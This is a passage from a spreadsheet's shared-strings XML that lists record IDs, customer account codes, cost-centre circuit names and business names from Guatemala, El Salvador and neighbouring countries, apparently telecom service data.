    <t>F4584704</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C197</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C197</t>
  </si>
  <si>
    <t>F4584707</t>
  </si>
  <si>
    <t>22047700SV</t>
  </si>
  <si>
    <t>SOLARES MAGANA Y ASOCIADOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4584714</t>
  </si>
  <si>
    <t>90001911000T</t>
  </si>
  <si>
    <t>539000001T</t>
  </si>
  <si>
    <t>DIMENSIONES INMOBILIARIAS S.A.</t>
  </si>
  <si>
    <t>F4601605</t>
  </si>
  <si>
    <t>F4601621</t>
  </si>
  <si>
    <t>F4601625</t>
  </si>
  <si>
    <t>F4601630</t>
  </si>
  <si>
    <t>F4601632</t>
  </si>
  <si>
    <t>F4601633</t>
  </si>
  <si>
    <t>F4601641</t>
  </si>
  <si>
    <t>F4601642</t>
  </si>
  <si>
    <t>25207100SV</t>
  </si>
  <si>
    <t>SOLVENTA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4601667</t>
  </si>
  <si>
    <t>1378236OH</t>
  </si>
  <si>
    <t>F4601686</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004074</t>
  </si>
  <si>
    <t>21333333SV</t>
  </si>
  <si>
    <t>23938300SV</t>
  </si>
  <si>
    <t>842400001T</t>
  </si>
  <si>
    <t>SERVICIOS MEDICOS ESPCIALIZADOS LA ESPERANZA</t>
  </si>
  <si>
    <t>F4601750</t>
  </si>
  <si>
    <t>F4601751</t>
  </si>
  <si>
    <t>F4601753</t>
  </si>
  <si>
    <t>1701234OH</t>
  </si>
  <si>
    <t>265900265T</t>
  </si>
  <si>
    <t>F4554998</t>
  </si>
  <si>
    <t>F4555037</t>
  </si>
  <si>
    <t>3338901ON</t>
  </si>
  <si>
    <t>F4555057</t>
  </si>
  <si>
    <t>ID1043025SV</t>
  </si>
  <si>
    <t>FRANQUICIAS DE CENTROAMERICA, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4555077</t>
  </si>
  <si>
    <t>422900001T</t>
  </si>
  <si>
    <t>LA CASA MARAVILLOSA</t>
  </si>
  <si>
    <t>F4555103</t>
  </si>
  <si>
    <t>F4555106</t>
  </si>
  <si>
    <t>F4555108</t>
  </si>
  <si>
    <t>F4555118</t>
  </si>
  <si>
    <t>F4602600</t>
  </si>
  <si>
    <t>8000059T</t>
  </si>
  <si>
    <t>F4602634</t>
  </si>
  <si>
    <t>F4602643</t>
  </si>
  <si>
    <t>F4602648</t>
  </si>
  <si>
    <t>409200002T</t>
  </si>
  <si>
    <t>INSTITUTO DE LA DEFENSA PUBLICA PENAL.</t>
  </si>
  <si>
    <t>452596ON</t>
  </si>
  <si>
    <t>CONTR0001831385OC</t>
  </si>
  <si>
    <t>4439277ON</t>
  </si>
  <si>
    <t>F4602669</t>
  </si>
  <si>
    <t>F4602674</t>
  </si>
  <si>
    <t>894900013T</t>
  </si>
  <si>
    <t>953200001T</t>
  </si>
  <si>
    <t>ASOCIACION PARA MUJERES LA PRECIOSA SANGRE</t>
  </si>
  <si>
    <t>F4602691</t>
  </si>
  <si>
    <t>25232800SV</t>
  </si>
  <si>
    <t>RGH DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4602696</t>
  </si>
  <si>
    <t>F4602709</t>
  </si>
  <si>
    <t>F4602714</t>
  </si>
  <si>
    <t>ID1024117SV</t>
  </si>
  <si>
    <t>SSERVICIOS DE DOCUMENTOS S.A DE C.V.</t>
  </si>
  <si>
    <t>F4602730</t>
  </si>
  <si>
    <t>F4602733</t>
  </si>
  <si>
    <t>664700027T</t>
  </si>
  <si>
    <t>863100002T</t>
  </si>
  <si>
    <t>F4602749</t>
  </si>
  <si>
    <t>812000006T</t>
  </si>
  <si>
    <t>1670888OH</t>
  </si>
  <si>
    <t>F4615839</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DDJ_ESCALON_NORTE</t>
  </si>
  <si>
    <t>23470200SV</t>
  </si>
  <si>
    <t>TRANSPORT S.A DE C.V.</t>
  </si>
  <si>
    <t>F4615852</t>
  </si>
  <si>
    <t>F4615859</t>
  </si>
  <si>
    <t>F4615864</t>
  </si>
  <si>
    <t>F4615866</t>
  </si>
  <si>
    <t>F4615869</t>
  </si>
  <si>
    <t>25269100SV</t>
  </si>
  <si>
    <t>F4615873</t>
  </si>
  <si>
    <t>F4615878</t>
  </si>
  <si>
    <t>F4615879</t>
  </si>
  <si>
    <t>3616989ON</t>
  </si>
  <si>
    <t>F4615896</t>
  </si>
  <si>
    <t>F4615897</t>
  </si>
  <si>
    <t>F4615899</t>
  </si>
  <si>
    <t>F4615901</t>
  </si>
  <si>
    <t>FH3321</t>
  </si>
  <si>
    <t>FH3320</t>
  </si>
  <si>
    <t>FH3323</t>
  </si>
  <si>
    <t>FH3325</t>
  </si>
  <si>
    <t>8200078T</t>
  </si>
  <si>
    <t>F4615922</t>
  </si>
  <si>
    <t>288900011T</t>
  </si>
  <si>
    <t>F4615943</t>
  </si>
  <si>
    <t>3398530ON</t>
  </si>
  <si>
    <t>F4615949</t>
  </si>
  <si>
    <t>852900001T</t>
  </si>
  <si>
    <t>F4615958</t>
  </si>
  <si>
    <t>349900088T</t>
  </si>
  <si>
    <t>F4615994</t>
  </si>
  <si>
    <t>47502176T</t>
  </si>
  <si>
    <t>97100100T</t>
  </si>
  <si>
    <t>F4550967</t>
  </si>
  <si>
    <t>F4550968</t>
  </si>
  <si>
    <t>F4550992</t>
  </si>
  <si>
    <t>F4550993</t>
  </si>
  <si>
    <t>F4550998</t>
  </si>
  <si>
    <t>F4550999</t>
  </si>
  <si>
    <t>90001801183T</t>
  </si>
  <si>
    <t>F4551012</t>
  </si>
  <si>
    <t>4166203ON</t>
  </si>
  <si>
    <t>F4551020</t>
  </si>
  <si>
    <t>F4551061</t>
  </si>
  <si>
    <t>F4551064</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_EL_BOTELLON</t>
  </si>
  <si>
    <t>F4551094</t>
  </si>
  <si>
    <t>F4551111</t>
  </si>
  <si>
    <t>F4551113</t>
  </si>
  <si>
    <t>F4551115</t>
  </si>
  <si>
    <t>923500001T</t>
  </si>
  <si>
    <t>LA AGENCIA DE RECLUTAMIENTO Y SELECCION DE PERSONAL MISCORP,S.A.</t>
  </si>
  <si>
    <t>F4569739</t>
  </si>
  <si>
    <t>22133900SV</t>
  </si>
  <si>
    <t>SRS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4569750</t>
  </si>
  <si>
    <t>22626200SV</t>
  </si>
  <si>
    <t>F4569755</t>
  </si>
  <si>
    <t>F4569758</t>
  </si>
  <si>
    <t>F4569760</t>
  </si>
  <si>
    <t>8901917T</t>
  </si>
  <si>
    <t>397200013T</t>
  </si>
  <si>
    <t>758500425T</t>
  </si>
  <si>
    <t>F4569766</t>
  </si>
  <si>
    <t>F4569767</t>
  </si>
  <si>
    <t>F4569768</t>
  </si>
  <si>
    <t>F4569769</t>
  </si>
  <si>
    <t>758500042T</t>
  </si>
  <si>
    <t>658615OH</t>
  </si>
  <si>
    <t>F4569782</t>
  </si>
  <si>
    <t>F4569790</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0296</t>
  </si>
  <si>
    <t>F4569792</t>
  </si>
  <si>
    <t>IP2105217SV</t>
  </si>
  <si>
    <t>F4569793</t>
  </si>
  <si>
    <t>F4569798</t>
  </si>
  <si>
    <t>863400118T</t>
  </si>
  <si>
    <t>ID1033109SV</t>
  </si>
  <si>
    <t>INNOVACIONES ALIMENTICIAS SA DE CV</t>
  </si>
  <si>
    <t>F4569806</t>
  </si>
  <si>
    <t>F4569813</t>
  </si>
  <si>
    <t>F4569818</t>
  </si>
  <si>
    <t>22338200SV</t>
  </si>
  <si>
    <t>F4569837</t>
  </si>
  <si>
    <t>F4569840</t>
  </si>
  <si>
    <t>90001909114T</t>
  </si>
  <si>
    <t>25270700SV</t>
  </si>
  <si>
    <t>N &amp; S ASESORES S.A. DE C.V.</t>
  </si>
  <si>
    <t>3732555ON</t>
  </si>
  <si>
    <t>F4569847</t>
  </si>
  <si>
    <t>F4569852</t>
  </si>
  <si>
    <t>22619700SV</t>
  </si>
  <si>
    <t>CORPORACION NAVIERA INTERCONTINENTAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4569869</t>
  </si>
  <si>
    <t>F4595447</t>
  </si>
  <si>
    <t>F4595448</t>
  </si>
  <si>
    <t>F4595453</t>
  </si>
  <si>
    <t>F4595454</t>
  </si>
  <si>
    <t>22816200SV</t>
  </si>
  <si>
    <t>ECOLAB, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4595470</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0272</t>
  </si>
  <si>
    <t>22099000SV</t>
  </si>
  <si>
    <t>SOCIEDAD DATUM S.A.DE C.V.</t>
  </si>
  <si>
    <t>F4595479</t>
  </si>
  <si>
    <t>47502666T</t>
  </si>
  <si>
    <t>ID1279002SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE CONCEPCION DE ORIENTE</t>
  </si>
  <si>
    <t>F4595483</t>
  </si>
  <si>
    <t>F4595484</t>
  </si>
  <si>
    <t>47502564T</t>
  </si>
  <si>
    <t>F4595501</t>
  </si>
  <si>
    <t>90001908508T</t>
  </si>
  <si>
    <t>47502580T</t>
  </si>
  <si>
    <t>F4595524</t>
  </si>
  <si>
    <t>F4595525</t>
  </si>
  <si>
    <t>F4595534</t>
  </si>
  <si>
    <t>IP2136052SV</t>
  </si>
  <si>
    <t>F4595536</t>
  </si>
  <si>
    <t>F4595547</t>
  </si>
  <si>
    <t>F4595552</t>
  </si>
  <si>
    <t>IP2148108SV</t>
  </si>
  <si>
    <t>777700010T</t>
  </si>
  <si>
    <t>F4595557</t>
  </si>
  <si>
    <t>F4595558</t>
  </si>
  <si>
    <t>F4595559</t>
  </si>
  <si>
    <t>F4595580</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_143</t>
  </si>
  <si>
    <t>349900172T</t>
  </si>
  <si>
    <t>F4559916</t>
  </si>
  <si>
    <t>F4559927</t>
  </si>
  <si>
    <t>22044100SV</t>
  </si>
  <si>
    <t>CASA ALIMEX S.A. DE C.V.</t>
  </si>
  <si>
    <t>898100001T</t>
  </si>
  <si>
    <t>CENTRO DE RADIOLOGIA SANTA CLARA, S.A.</t>
  </si>
  <si>
    <t>F4559931</t>
  </si>
  <si>
    <t>90001907064T</t>
  </si>
  <si>
    <t>539600015T</t>
  </si>
  <si>
    <t>F4559935</t>
  </si>
  <si>
    <t>F4559941</t>
  </si>
  <si>
    <t>F4559942</t>
  </si>
  <si>
    <t>4633603ON</t>
  </si>
  <si>
    <t>ON0000597801/HOTEL PLAZA REAL, S.A.                  -</t>
  </si>
  <si>
    <t>F4559944</t>
  </si>
  <si>
    <t>IP2035069SV</t>
  </si>
  <si>
    <t>F4559946</t>
  </si>
  <si>
    <t>F4559947</t>
  </si>
  <si>
    <t>F4559949</t>
  </si>
  <si>
    <t>F4559951</t>
  </si>
  <si>
    <t>938189</t>
  </si>
  <si>
    <t>937799OH</t>
  </si>
  <si>
    <t>F4559988</t>
  </si>
  <si>
    <t>F4559990</t>
  </si>
  <si>
    <t>47500835T</t>
  </si>
  <si>
    <t>297400118T</t>
  </si>
  <si>
    <t>90001908105T</t>
  </si>
  <si>
    <t>F4560002</t>
  </si>
  <si>
    <t>5028605ON</t>
  </si>
  <si>
    <t>ON0000436462/MASIS FAJARDO ALVARO ERNESTO</t>
  </si>
  <si>
    <t>F4560019</t>
  </si>
  <si>
    <t>863400050T</t>
  </si>
  <si>
    <t>297401524T</t>
  </si>
  <si>
    <t>F4560028</t>
  </si>
  <si>
    <t>F4560029</t>
  </si>
  <si>
    <t>F4560032</t>
  </si>
  <si>
    <t>ID1001206SV</t>
  </si>
  <si>
    <t>FUNDACION PARA LA EDUCACION INTEGRAL SALVADOREÑA</t>
  </si>
  <si>
    <t>F4560054</t>
  </si>
  <si>
    <t>F4588546</t>
  </si>
  <si>
    <t>F4588555</t>
  </si>
  <si>
    <t>F4588566</t>
  </si>
  <si>
    <t>F4588570</t>
  </si>
  <si>
    <t>F4588571</t>
  </si>
  <si>
    <t>F4588572</t>
  </si>
  <si>
    <t>619500042T</t>
  </si>
  <si>
    <t>55500014T</t>
  </si>
  <si>
    <t>F4588586</t>
  </si>
  <si>
    <t>F4588590</t>
  </si>
  <si>
    <t>F4588591</t>
  </si>
  <si>
    <t>22044200SV</t>
  </si>
  <si>
    <t>CONASAN</t>
  </si>
  <si>
    <t>ID1026238SV</t>
  </si>
  <si>
    <t>F4588625</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_32</t>
  </si>
  <si>
    <t>F4588626</t>
  </si>
  <si>
    <t>F4588636</t>
  </si>
  <si>
    <t>F4588637</t>
  </si>
  <si>
    <t>F4588643</t>
  </si>
  <si>
    <t>F4588646</t>
  </si>
  <si>
    <t>F4588647</t>
  </si>
  <si>
    <t>453162ON</t>
  </si>
  <si>
    <t>F4588667</t>
  </si>
  <si>
    <t>296800036T</t>
  </si>
  <si>
    <t>ID1099144SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SONZACATE</t>
  </si>
  <si>
    <t>F4588676</t>
  </si>
  <si>
    <t>IDG000604SV</t>
  </si>
  <si>
    <t>CENTRAL DULCERA S.A. DE C.V.</t>
  </si>
  <si>
    <t>808100002T</t>
  </si>
  <si>
    <t>F4602151</t>
  </si>
  <si>
    <t>529200001T</t>
  </si>
  <si>
    <t>AGROCENTRO S.A.</t>
  </si>
  <si>
    <t>IP2204072SV</t>
  </si>
  <si>
    <t>F4602180</t>
  </si>
  <si>
    <t>836200001T</t>
  </si>
  <si>
    <t>TURPILASA S.A.</t>
  </si>
  <si>
    <t>F4602181</t>
  </si>
  <si>
    <t>836200003T</t>
  </si>
  <si>
    <t>419100001T</t>
  </si>
  <si>
    <t>F4602208</t>
  </si>
  <si>
    <t>F4602210</t>
  </si>
  <si>
    <t>F4602220</t>
  </si>
  <si>
    <t>IPG003126SV</t>
  </si>
  <si>
    <t>F4602255</t>
  </si>
  <si>
    <t>90001902581T</t>
  </si>
  <si>
    <t>F4602264</t>
  </si>
  <si>
    <t>1744870OH</t>
  </si>
  <si>
    <t>802814OH</t>
  </si>
  <si>
    <t>OH1000689324/FERTILIZANTES DEL NORTE S A -</t>
  </si>
  <si>
    <t>F4602276</t>
  </si>
  <si>
    <t>F4606602</t>
  </si>
  <si>
    <t>1744878OH</t>
  </si>
  <si>
    <t>F4606604</t>
  </si>
  <si>
    <t>F4606606</t>
  </si>
  <si>
    <t>F4606609</t>
  </si>
  <si>
    <t>F4606610</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_INTERNET_RETALHULEU</t>
  </si>
  <si>
    <t>F4606615</t>
  </si>
  <si>
    <t>F4606621</t>
  </si>
  <si>
    <t>855200001T</t>
  </si>
  <si>
    <t>HOTEL Y RESTAURANTE POSADA DE FIDEL.</t>
  </si>
  <si>
    <t>426200011T</t>
  </si>
  <si>
    <t>F4606631</t>
  </si>
  <si>
    <t>F4606633</t>
  </si>
  <si>
    <t>F4606637</t>
  </si>
  <si>
    <t>F4606638</t>
  </si>
  <si>
    <t>23473300SV</t>
  </si>
  <si>
    <t>F4606651</t>
  </si>
  <si>
    <t>F4606653</t>
  </si>
  <si>
    <t>5133612ON</t>
  </si>
  <si>
    <t>F4606667</t>
  </si>
  <si>
    <t>F4606668</t>
  </si>
  <si>
    <t>F4606669</t>
  </si>
  <si>
    <t>F4606670</t>
  </si>
  <si>
    <t>F4606674</t>
  </si>
  <si>
    <t>F4606679</t>
  </si>
  <si>
    <t>1598971OH</t>
  </si>
  <si>
    <t>F4606689</t>
  </si>
  <si>
    <t>F4606690</t>
  </si>
  <si>
    <t>1598981OH</t>
  </si>
  <si>
    <t>349400044T</t>
  </si>
  <si>
    <t>F4606712</t>
  </si>
  <si>
    <t>90001911103T</t>
  </si>
  <si>
    <t>F4606724</t>
  </si>
  <si>
    <t>F4606725</t>
  </si>
  <si>
    <t>296800011T</t>
  </si>
  <si>
    <t>F4606729</t>
  </si>
  <si>
    <t>907491OH</t>
  </si>
  <si>
    <t>773700001T</t>
  </si>
  <si>
    <t>POLYSCAN ISP, S.A.</t>
  </si>
  <si>
    <t>F4606742</t>
  </si>
  <si>
    <t>F4606743</t>
  </si>
  <si>
    <t>F4606744</t>
  </si>
  <si>
    <t>F4616171</t>
  </si>
  <si>
    <t>PA-MNCSCT0002M-PPA</t>
  </si>
  <si>
    <t xml:space="preserve">SCOTIABANK- DAVID_TIER3  </t>
  </si>
  <si>
    <t>65400008T</t>
  </si>
  <si>
    <t>DHL DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4616235</t>
  </si>
  <si>
    <t>F4616236</t>
  </si>
  <si>
    <t>F4616256</t>
  </si>
  <si>
    <t>F4616270</t>
  </si>
  <si>
    <t>99900393T</t>
  </si>
  <si>
    <t>F4616276</t>
  </si>
  <si>
    <t>233400113T</t>
  </si>
  <si>
    <t>F4562737</t>
  </si>
  <si>
    <t>F4562748</t>
  </si>
  <si>
    <t>F4562751</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_INT_SN_SEB_CHIQ</t>
  </si>
  <si>
    <t>F4562754</t>
  </si>
  <si>
    <t>F4562756</t>
  </si>
  <si>
    <t>313900369T</t>
  </si>
  <si>
    <t>F4562770</t>
  </si>
  <si>
    <t>F4562771</t>
  </si>
  <si>
    <t>24299500SV</t>
  </si>
  <si>
    <t>UNIVERSIDAD DE SONSONATE</t>
  </si>
  <si>
    <t>F4562777</t>
  </si>
  <si>
    <t>90001909919T</t>
  </si>
  <si>
    <t>F4562793</t>
  </si>
  <si>
    <t>90001901977T</t>
  </si>
  <si>
    <t>F4562804</t>
  </si>
  <si>
    <t>F4562805</t>
  </si>
  <si>
    <t>F4562812</t>
  </si>
  <si>
    <t>887500040T</t>
  </si>
  <si>
    <t>F4562816</t>
  </si>
  <si>
    <t>F4562818</t>
  </si>
  <si>
    <t>F4562823</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0351</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_APN_MOVIL</t>
  </si>
  <si>
    <t>F4562835</t>
  </si>
  <si>
    <t>F4562847</t>
  </si>
  <si>
    <t>86100082T</t>
  </si>
  <si>
    <t>F4562860</t>
  </si>
  <si>
    <t>F4562862</t>
  </si>
  <si>
    <t>886500002T</t>
  </si>
  <si>
    <t>OE CONSTRUCTORES, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>F4525633</t>
  </si>
  <si>
    <t>F4551980</t>
  </si>
  <si>
    <t>24027800SV</t>
  </si>
  <si>
    <t>CONTR0001737648OC</t>
  </si>
  <si>
    <t>ASOCIACION SOLIDARISTA DE EMPLEADOS DE U LATINA</t>
  </si>
  <si>
    <t>665951OH</t>
  </si>
  <si>
    <t>F4552027</t>
  </si>
  <si>
    <t>F4552034</t>
  </si>
  <si>
    <t>F4552037</t>
  </si>
  <si>
    <t>F4552038</t>
  </si>
  <si>
    <t>F4552047</t>
  </si>
  <si>
    <t>F4552058</t>
  </si>
  <si>
    <t>F4552059</t>
  </si>
  <si>
    <t>F4552066</t>
  </si>
  <si>
    <t>F4552069</t>
  </si>
  <si>
    <t>F4552080</t>
  </si>
  <si>
    <t>F4552081</t>
  </si>
  <si>
    <t>IP2366001SV</t>
  </si>
  <si>
    <t>FEDECACES</t>
  </si>
  <si>
    <t>F4552088</t>
  </si>
  <si>
    <t>872600027T</t>
  </si>
  <si>
    <t>F4552098</t>
  </si>
  <si>
    <t>F4552102</t>
  </si>
  <si>
    <t>1361401OH</t>
  </si>
  <si>
    <t>*PANADERÍA AMERICANA SDR</t>
  </si>
  <si>
    <t>F4552111</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_EL_PAJON</t>
  </si>
  <si>
    <t>284500061T</t>
  </si>
  <si>
    <t>910400060T</t>
  </si>
  <si>
    <t>F4571297</t>
  </si>
  <si>
    <t>F4571302</t>
  </si>
  <si>
    <t>22057600SV</t>
  </si>
  <si>
    <t>GRICENTER S.A DE C.V</t>
  </si>
  <si>
    <t>630452OH</t>
  </si>
  <si>
    <t>F4571322</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C163</t>
  </si>
  <si>
    <t>24481847SV</t>
  </si>
  <si>
    <t>JOSE ADAN MAGAÑA LOPEZ</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CERRITO_DE_MAIZ</t>
  </si>
  <si>
    <t>826900029T</t>
  </si>
  <si>
    <t>699640OH</t>
  </si>
  <si>
    <t>OH1000626661/NEGOCIOS CENTROAMERICANOS -</t>
  </si>
  <si>
    <t>F4571355</t>
  </si>
  <si>
    <t>F4571361</t>
  </si>
  <si>
    <t>487100001T</t>
  </si>
  <si>
    <t>SERVICIOS MEDICOS Y HOSPITALARIOS ESKALA S.A.</t>
  </si>
  <si>
    <t>4879546ON</t>
  </si>
  <si>
    <t>90001904606T</t>
  </si>
  <si>
    <t>F4571381</t>
  </si>
  <si>
    <t>F4571392</t>
  </si>
  <si>
    <t>F4571396</t>
  </si>
  <si>
    <t>F4571401</t>
  </si>
  <si>
    <t>609300001T</t>
  </si>
  <si>
    <t>KALLANKAS, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4571413</t>
  </si>
  <si>
    <t>F4571423</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4103</t>
  </si>
  <si>
    <t>F4571424</t>
  </si>
  <si>
    <t>F4571427</t>
  </si>
  <si>
    <t>F4596060</t>
  </si>
  <si>
    <t>F4596061</t>
  </si>
  <si>
    <t>F4596064</t>
  </si>
  <si>
    <t>F4596093</t>
  </si>
  <si>
    <t>22064000SV</t>
  </si>
  <si>
    <t>CREDOMATIC DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4596096</t>
  </si>
  <si>
    <t>F4596134</t>
  </si>
  <si>
    <t>658400001T</t>
  </si>
  <si>
    <t>BUSINESS CENTERS OF THE AMERICAS (LANDMARK DE GUATEMALA, S.A)</t>
  </si>
  <si>
    <t>5339941ON</t>
  </si>
  <si>
    <t>OCAL</t>
  </si>
  <si>
    <t>F4596142</t>
  </si>
  <si>
    <t>F4596148</t>
  </si>
  <si>
    <t>23144630SV</t>
  </si>
  <si>
    <t>ANDALUCIA S.A DE C.V.</t>
  </si>
  <si>
    <t>F4596158</t>
  </si>
  <si>
    <t>F4596166</t>
  </si>
  <si>
    <t>F4596172</t>
  </si>
  <si>
    <t>F4596175</t>
  </si>
  <si>
    <t>F4596177</t>
  </si>
  <si>
    <t>F4596179</t>
  </si>
  <si>
    <t>F4596180</t>
  </si>
  <si>
    <t>F4560062</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_ESQUIPULAS_022</t>
  </si>
  <si>
    <t>F4560070</t>
  </si>
  <si>
    <t>F4560074</t>
  </si>
  <si>
    <t>910400073T</t>
  </si>
  <si>
    <t>881886OH</t>
  </si>
  <si>
    <t>F4560087</t>
  </si>
  <si>
    <t>47502773T</t>
  </si>
  <si>
    <t>90001902816T</t>
  </si>
  <si>
    <t>F4560098</t>
  </si>
  <si>
    <t>F4560100</t>
  </si>
  <si>
    <t>F4560101</t>
  </si>
  <si>
    <t>F4560109</t>
  </si>
  <si>
    <t>F4560112</t>
  </si>
  <si>
    <t>758500319T</t>
  </si>
  <si>
    <t>F4560113</t>
  </si>
  <si>
    <t>297401277T</t>
  </si>
  <si>
    <t>F4560124</t>
  </si>
  <si>
    <t>1045315OH</t>
  </si>
  <si>
    <t>893200007T</t>
  </si>
  <si>
    <t>93400024T</t>
  </si>
  <si>
    <t>F4560162</t>
  </si>
  <si>
    <t>F4560165</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2363</t>
  </si>
  <si>
    <t>F4560169</t>
  </si>
  <si>
    <t>F4560191</t>
  </si>
  <si>
    <t>F4560193</t>
  </si>
  <si>
    <t>90001801324T</t>
  </si>
  <si>
    <t>1659344OH</t>
  </si>
  <si>
    <t>OH1001043702</t>
  </si>
  <si>
    <t>F4560199</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000412</t>
  </si>
  <si>
    <t>F4560202</t>
  </si>
  <si>
    <t>F4560208</t>
  </si>
  <si>
    <t>F4588680</t>
  </si>
  <si>
    <t>F4588681</t>
  </si>
  <si>
    <t>IDG000658SV</t>
  </si>
  <si>
    <t>DANIEL ALFREDO CASTRO RODRIGUEZ</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_GCC003726</t>
  </si>
  <si>
    <t>IDG000605SV</t>
  </si>
  <si>
    <t>758500126T</t>
  </si>
  <si>
    <t>F4588692</t>
  </si>
  <si>
    <t>F4588698</t>
  </si>
  <si>
    <t>758500163T</t>
  </si>
  <si>
    <t>F4588703</t>
  </si>
  <si>
    <t>F4588706</t>
  </si>
  <si>
    <t>F4588710</t>
  </si>
  <si>
    <t>F4588711</t>
  </si>
  <si>
    <t>F4588713</t>
  </si>
  <si>
    <t>F4588714</t>
  </si>
  <si>
    <t>F4588716</t>
  </si>
  <si>
    <t>F4588726</t>
  </si>
  <si>
    <t>F4588736</t>
  </si>
  <si>
    <t>F4588738</t>
  </si>
  <si>
    <t>713405OH</t>
  </si>
  <si>
    <t>OH1000635487/EUROTIENDAS DE HONDURAS -</t>
  </si>
  <si>
    <t>F4588750</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0003</t>
  </si>
  <si>
    <t>F4588766</t>
  </si>
  <si>
    <t>F4588769</t>
  </si>
  <si>
    <t>F4588774</t>
  </si>
  <si>
    <t>IDG000530SV</t>
  </si>
  <si>
    <t>F4588777</t>
  </si>
  <si>
    <t>F4588780</t>
  </si>
  <si>
    <t>349900403T</t>
  </si>
  <si>
    <t>22137700SV</t>
  </si>
  <si>
    <t>4287113ON</t>
  </si>
  <si>
    <t>ON0002562572/EUROTIENDAS DE NICARAGUA S.A.EUROTIENDAS DE NICARAGUA S.A</t>
  </si>
  <si>
    <t>841100001T</t>
  </si>
  <si>
    <t>INGRESOS, S.A.</t>
  </si>
  <si>
    <t>F4588804</t>
  </si>
  <si>
    <t>90001907422T</t>
  </si>
  <si>
    <t>F4588810</t>
  </si>
  <si>
    <t>22011900SV</t>
  </si>
  <si>
    <t>LACTEOS DEL CORRAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4588820</t>
  </si>
  <si>
    <t>357400008T</t>
  </si>
  <si>
    <t>357400016T</t>
  </si>
  <si>
    <t>F4602937</t>
  </si>
  <si>
    <t>863400132T</t>
  </si>
  <si>
    <t>F4602940</t>
  </si>
  <si>
    <t>F4602942</t>
  </si>
  <si>
    <t>F4602945</t>
  </si>
  <si>
    <t>F4602946</t>
  </si>
  <si>
    <t>600800003T</t>
  </si>
  <si>
    <t>F4602958</t>
  </si>
  <si>
    <t>F4602960</t>
  </si>
  <si>
    <t>F4602963</t>
  </si>
  <si>
    <t>F4602964</t>
  </si>
  <si>
    <t>935100001T</t>
  </si>
  <si>
    <t>ALORICA COMUNICACIONES GUATEMALA LIMITADA</t>
  </si>
  <si>
    <t>400000054T</t>
  </si>
  <si>
    <t>23222400SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL SAN PEDRO PERULAPAN</t>
  </si>
  <si>
    <t>F4602985</t>
  </si>
  <si>
    <t>F4602989</t>
  </si>
  <si>
    <t>F4602991</t>
  </si>
  <si>
    <t>564253OH</t>
  </si>
  <si>
    <t>F4603001</t>
  </si>
  <si>
    <t>1744999OH</t>
  </si>
  <si>
    <t>62900080T</t>
  </si>
  <si>
    <t>527769ON</t>
  </si>
  <si>
    <t>617800043T</t>
  </si>
  <si>
    <t>IDG002056SV</t>
  </si>
  <si>
    <t>F4603044</t>
  </si>
  <si>
    <t>F4603045</t>
  </si>
  <si>
    <t>F4603049</t>
  </si>
  <si>
    <t>F4603051</t>
  </si>
  <si>
    <t>F4603057</t>
  </si>
  <si>
    <t>25211000SV</t>
  </si>
  <si>
    <t>ACACYA DE R.L.ASOC.COOP.AHORRO</t>
  </si>
  <si>
    <t>F4603061</t>
  </si>
  <si>
    <t>F4603065</t>
  </si>
  <si>
    <t>F4603069</t>
  </si>
  <si>
    <t>777785OH</t>
  </si>
  <si>
    <t>F4610128</t>
  </si>
  <si>
    <t>F4610129</t>
  </si>
  <si>
    <t>292900465T</t>
  </si>
  <si>
    <t>F4610160</t>
  </si>
  <si>
    <t>F4610161</t>
  </si>
  <si>
    <t>5170940ON</t>
  </si>
  <si>
    <t>F4610169</t>
  </si>
  <si>
    <t>F4610194</t>
  </si>
  <si>
    <t>F4610201</t>
  </si>
  <si>
    <t>F4610218</t>
  </si>
  <si>
    <t>F4610227</t>
  </si>
  <si>
    <t>F4610228</t>
  </si>
  <si>
    <t>F4610230</t>
  </si>
  <si>
    <t>90001903581T</t>
  </si>
  <si>
    <t>897400010T</t>
  </si>
  <si>
    <t>F4616690</t>
  </si>
  <si>
    <t>F4616693</t>
  </si>
  <si>
    <t>38300524T</t>
  </si>
  <si>
    <t>23939800SV</t>
  </si>
  <si>
    <t>600400001T</t>
  </si>
  <si>
    <t>COMERCIALIZADORA EL CISNE S.A.</t>
  </si>
  <si>
    <t>F4616724</t>
  </si>
  <si>
    <t>956100001T</t>
  </si>
  <si>
    <t>CLAI PAYMENTS GUATEMALA S.A.</t>
  </si>
  <si>
    <t>767000022T</t>
  </si>
  <si>
    <t>F4616736</t>
